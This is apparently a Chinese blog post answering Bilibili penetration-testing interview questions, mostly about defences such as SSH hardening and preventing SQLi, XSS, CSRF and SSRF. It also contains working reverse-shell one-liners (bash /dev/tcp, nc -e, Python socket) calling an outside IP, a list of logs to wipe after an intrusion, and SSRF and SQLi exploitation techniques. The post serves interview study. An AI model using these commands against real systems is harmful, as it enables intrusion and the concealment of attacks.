2025年渗透测试面试题总结-哔哩哔哩电面(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

哔哩哔哩电面

[CTF 攻防赛](#CTF 攻防赛)

流程与技巧

服务器运维

端口连接命令与工具对比

Linux安全运维与SSH保护

入侵后日志清除

反弹Shell

渗透测试

流程

常用扫描器

SQL注入

XSS防范

CSRF防护

SSRF利用与防范

安全运营

防范羊毛党

XSS漏洞快速定位

新漏洞快速排查

安全负责人措施

沟通修复漏洞

哔哩哔哩电面

复制代码
## CTF 相关

- 简述 CTF 攻防赛的流程和一些技巧;

## 服务器运维

- 查看当前端口连接的命令有哪些?`netstat` 和 `ss` 命令的区别和优缺点;
- Linux 服务器的安全运维操作有哪些?如何保护 SSH?
- 入侵 Linux 服务器后需要清除哪些日志?
- 反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?

## 渗透测试

- 介绍渗透测试的流程;
- 简要介绍自己常用的扫描器和其实现上的特点;
- 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?
- 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?
- 介绍 CSRF 漏洞和常用的防护手段;
- 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?

## 安全运营

- 如何防范羊毛党(有猫池)?
- 如果 SRC 上报了一个 XSS 漏洞,payload 已经写入页面,但未给出具体位置,如何快速介入?
- 发现一个大范围影响的新漏洞,如何快速排查公司资产?
- 如果你是安全运营的负责人,简要介绍你对安全方面采取的措施;
- 发现了一个漏洞,你报告给开发人员,但是开发人员不愿意修漏洞,如何沟通?(这是个什么奇怪的问题。。。)

CTF 攻防赛

流程与技巧
  1. 流程
    • 准备阶段:熟悉规则、组建团队、分工(逆向、Web、PWN等)。
    • 解题模式:通过漏洞利用或密码学挑战获取flag并提交得分。
    • 攻防模式:攻击对手服务获取flag,同时加固自身服务防止被攻击。
    • 混合模式:结合解题与攻防,动态积分机制。
  2. 技巧
    • 优先解决高分简单题(如Web漏洞)。
    • 关注常见漏洞类型(如栈溢出、SQL注入)。
    • 使用自动化工具(如pwntools、Burp Suite)。
    • 防守时实时监控日志,修补漏洞。

服务器运维

端口连接命令与工具对比
  1. 命令netstat -antpss -antplsof -i
  2. netstat vs ss
    • netstat :依赖/proc文件系统,功能全面但性能低(万级连接易卡顿)。
    • ss :基于内核netlink接口,速度更快(毫秒级响应),支持TCP状态过滤(如ss state established)。
Linux安全运维与SSH保护
  1. 安全操作
    • 定期更新内核及软件包(unattended-upgrades)。
    • 配置防火墙(iptables/nftables仅放行必要端口)。
    • 禁用无用服务(systemctl mask)。
    • 日志审计(auditd监控敏感文件修改)。
  2. SSH加固
    • 禁用密码登录,仅允许密钥认证(PasswordAuthentication no)。
    • 限制登录IP(AllowUsers [email protected]/24)。
    • 修改默认端口(Port 2222)。
    • 启用双因素认证(如Google Authenticator)。
入侵后日志清除
  • 系统日志/var/log/auth.log (SSH记录)、/var/log/syslog(通用日志)。
  • 隐藏痕迹 :清除/var/log/wtmp(登录记录)、~/.bash_history(命令历史)。
  • Web日志 :Apache的access.log/error.log ,Nginx的access.log
反弹Shell
  1. 常用命令

    复制代码
    bash`bash -i >& /dev/tcp/1.1.1.1/4444 0>&1 nc -e /bin/sh 1.1.1.1 4444 python -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("1.1.1.1",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])' `
  2. 常用类型 :优先反弹/bin/bash/bin/sh,若环境受限可尝试Python/PHP的伪终端(pty.spawn("/bin/sh") )。


渗透测试

流程
  1. 信息收集 :Whois查询、子域名枚举(subfinder)、端口扫描(nmap -sV)。
  2. 漏洞扫描 :使用Nmap脚本(--script vuln)、Nessus。
  3. 漏洞利用:Metasploit框架、手工验证(如SQL注入绕过)。
  4. 后渗透 :提权(LinPEAS)、横向移动、数据窃取。
  5. 报告输出:漏洞详情、复现步骤、修复建议(CVSS评分)。
常用扫描器
  1. Nmap :支持自定义脚本(如http-sql-injection.nse ),灵活但需手动分析。
  2. Burp Suite:拦截修改请求(Repeater模块测试XSS/SQLi),支持插件扩展(如Collaborator检测SSRF)。
  3. sqlmap :自动化注入(支持时间盲注、堆查询注入),可绕过WAF(--tamper参数)。
SQL注入
  1. 成因 :未过滤用户输入,直接拼接SQL语句(如"SELECT * FROM users WHERE id=" + input)。
  2. 防范
    • 参数化查询(Prepared Statements)。
    • 最小化数据库权限(禁止FILE权限)。
  3. 注入方式:联合查询、报错注入、布尔盲注、时间盲注。
  4. 利用扩展
    • 读写文件(LOAD_FILE/INTO OUTFILE)。
    • 执行系统命令(MySQL的sys_exec,需UDF提权)。
XSS防范
  1. 前端
    • 转义HTML实体(如<转义为&lt;)。
    • 启用CSP(Content-Security-Policy: default-src 'self')。
  2. 后端 :输入验证(如白名单过滤<script>),输出编码(根据上下文选择HTML/URL编码)。
  3. 优先级:后端防护更关键,前端可被绕过(如Burp修改请求)。
CSRF防护
  1. 漏洞原理:诱导用户点击链接,以用户身份执行操作(如转账)。
  2. 防护
    • 添加Token(随机字符串校验请求来源)。
    • 校验Referer头(仅允许本站域名)。
    • 关键操作二次验证(如短信确认)。
SSRF利用与防范
  1. 深入利用
    • 访问内网服务(如Redis未授权访问)。
    • 利用协议(file:///etc/passwddict://获取端口信息)。
  2. 非HTTP探测
    • 使用gopher://构造TCP包探测Redis/MySQL。
    • 利用DNS回显(http://dnslog.cn )。
  3. 防范
    • 禁用URL协议(黑名单过滤filegopher)。
    • 使用白名单域名(仅允许访问可信地址)。

安全运营

防范羊毛党
  1. 技术措施
    • 设备指纹(识别虚拟机、同一IP多账号)。
    • 人机验证(滑块验证、短信验证码)。
    • 限流策略(同一用户每分钟最多3次请求)。
  2. 数据分析:监控异常行为(如凌晨批量注册账号)。
XSS漏洞快速定位
  1. 排查步骤
    • 全站搜索写入点(如数据库、缓存中的用户输入)。
    • 检查HTTP流量(Burp历史记录中查找payload)。
    • 使用浏览器调试工具(审查DOM节点中的可疑脚本)。
新漏洞快速排查
  1. 流程
    • 通过CMDB(资产管理系统)拉取受影响组件列表。
    • 使用漏洞扫描工具(Nexpose、Nuclei模板批量检测)。
    • 优先处理暴露在公网的资产(如边界防火墙后的Web服务)。
安全负责人措施
  1. 体系构建
    • 建立SDL(安全开发生命周期),要求安全评审嵌入开发流程。
    • 部署WAF、IDS、HIDS(主机入侵检测)。
    • 定期红蓝对抗演练。
沟通修复漏洞
  1. 策略
    • 量化风险(如漏洞可能导致数据泄露,预估损失金额)。
    • 提供修复方案(如代码示例、第三方库升级指南)。
    • 上升至管理层(若仍拒绝,通过合规部门推动)。
相关推荐
易·木2 分钟前
在Linux服务器上部署Jupyter Notebook并实现ssh无密码远程访问
linux·服务器·jupyter
jialan754 分钟前
linux关闭某端口暂用的进程
linux·运维·服务器
癸酉金鸡12 分钟前
将 /dev/vdb1 的空间全部合并到 /dev/mapper/centos-root(即扩展 CentOS 的根分区)
linux·运维·centos
肖永威20 分钟前
HomeAssistant开源的智能家居docker快速部署实践笔记(CentOS7)
linux·docker
2302_799525741 小时前
【Linux】第二十四章 管理网络安全
linux·网络·web安全
christine-rr1 小时前
【25软考网工】第七章 (2)UOS Linux文件和目录管理、用户和组管理
linux·运维·服务器·网络工程师·软考
前进的程序员2 小时前
Linux 移植 Docker 详解
linux·运维·docker
散着步的码农2 小时前
RustDesk CentOS自建中继节点
linux·centos
瀚高PG实验室2 小时前
hghac集群服务器时间同步(chrony同步)
linux·运维·服务器
huangyuchi.2 小时前
【Linux】初见,基础指令
linux·运维·服务器·笔记·开发工具·指令·基础指令